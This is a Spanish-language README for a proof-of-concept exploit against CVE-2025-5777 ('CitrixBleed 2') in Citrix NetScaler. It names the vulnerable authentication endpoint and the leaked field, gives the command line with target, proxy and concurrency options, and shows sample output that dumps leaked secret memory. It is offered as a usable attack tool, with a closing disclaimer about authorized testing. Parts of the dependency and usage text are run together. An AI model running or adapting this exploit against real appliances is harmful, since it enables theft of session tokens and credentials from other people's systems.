
PoC de Fuga de Memoria en Citrix NetScaler
Este script explota una vulnerabilidad crítica de divulgación de memoria en los dispositivos Citrix NetScaler ADC/Gateway, identificada como CVE-2025-5777 (denominada CitrixBleed 2). Provoca una fuga de memoria a través del endpoint /p/u/doAuthentication.do, revelando memoria no inicializada que contiene datos sensibles como fragmentos XML, tokens y potencialmente credenciales.
aiohttpaiohttp, coloramaasyncio + aiohttp<InitialValue>python3 CVE-2025-5777.py http://<target> [options]
| Opción | Descripción |
|---|---|
-v, --verbose | Habilitar salida de depuración verbose |
-p <proxy> | Usar proxy HTTP (ej. http://127.0.0.1:8080) |
-t <threads> | Número de solicitudes concurrentes (predeterminado: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
Author: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] ¡Fuga de memoria InitialValue encontrada!
[🧠] Volcado hexadecimal:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] Fuga confirmada. Continuando extracción...
Esta prueba de concepto está destinada únicamente para pruebas de seguridad educativas y autorizadas. El escaneo o explotación no autorizada de sistemas que no posees es ilegal.